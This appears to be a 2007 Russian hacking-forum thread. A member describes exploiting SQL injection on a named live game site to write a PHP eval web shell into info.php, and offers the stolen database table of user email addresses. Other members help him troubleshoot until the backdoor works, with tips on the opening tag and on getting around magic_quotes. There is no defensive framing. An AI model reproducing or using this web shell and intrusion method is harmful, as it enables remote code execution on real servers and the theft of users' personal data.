Сломал сайт, залил Php файл, а ничё не работает!

Discussion in 'PHP' started by Ponchik, 9 Jan 2007.

  1. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Хай! Вот нащёл сайт!
    _http://jeux-mu-sacre-online.no-ip.org/
    Нащёл в нём SQL Injection, выполнил команду
    echo "<? eval(stripslashes($_GET[c])); ?>" > D:/wamp/www/info.php
    Файл создался, но...
    http://jeux-mu-sacre-online.no-ip.org/info.php?c=echo '123';
    И ничего... В общем если кому удасться разобраться в чём проблема, раскажите :) А БД можете себе брать, тама MSSQL в
    БД: MuOnline
    Таблица: MEMB_INFO
    Колонка: mail_addr
    Хранятся мыльники юзверей (я так понимаю их тама только 389 :( )
    В общем очень интересно где скривили мои руки, почему сервер не слушает меня :mad:
     
  2. sunb0rn

    sunb0rn Member

    Joined:
    5 Sep 2006
    Messages:
    11
    Likes Received:
    7
    Reputations:
    5
    А ты посмотри в сорсаx что делается ;) - "<? eval(stripslashes($_GET[c])); ?>" так в кавычкаx и осталось!!!
     
    1 person likes this.
  3. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    ссылку на саму sql Injection!В студию.
     
    1 person likes this.
  4. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    sunb0rn, а без ковычек никак, ктомуже они на PHP никак не действуют! Как я буду использовать echo text > file если там символ > и в <? , ?> тоже эти символы...
    Я так много раз делал, всё работало, а вот тут нехочет...
     
    #4 Ponchik, 9 Jan 2007
    Last edited: 9 Jan 2007
    1 person likes this.
  5. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    sunb0rn, php код между тегами <? ?> в данном случае. все что до него и после - не важно.
    Ponchik, посмотри код страницы) пхп не обрабатывается.
     
  6. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Почему не обрабатывается... Еслиб не обрабатывался, нобы и выводил весь код страницы, а так всё фурычит... Странно... Мистикааааа! В общем можно забить на этот сайт...
     
  7. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    [​IMG]
    не спорь ((=
     
  8. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Позволь поспорить
    http://img177.imageshack.us/img177/3940/screenshot0pg1.jpg
     
  9. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    я про сайт :d
     
  10. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    если magic_quotes=on то нихуя работать не будет. Можно обойти например echo(chr(0x56))
     
  11. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Green_Bear, в смысле про сайт... Вот я на локалхосте проверил и показал!
    max_pain89, ты про ' превращается в \' ? Для этого я юзаю stripslashes() он исправляет этот баг
    Да и твой вариант всёравно не работает, бнсполезно я так понимаю пытаться, потому-что я и copy("шелл","Системный путь") проблвал, нефурычит! Странно...
     
  12. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    кароч понял что за фишка... у меня тож wamp стоял... долго не мог допереть почему мои скрипты так же не пашут =)))
    оказываецо надо делать так <?php eval(stripslashes($_GET[c])); ?> ;)
     
    _________________________
    1 person likes this.
  13. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Ёшкин кот! Ядрён батон! Работает! Спасибо!
     
    1 person likes this.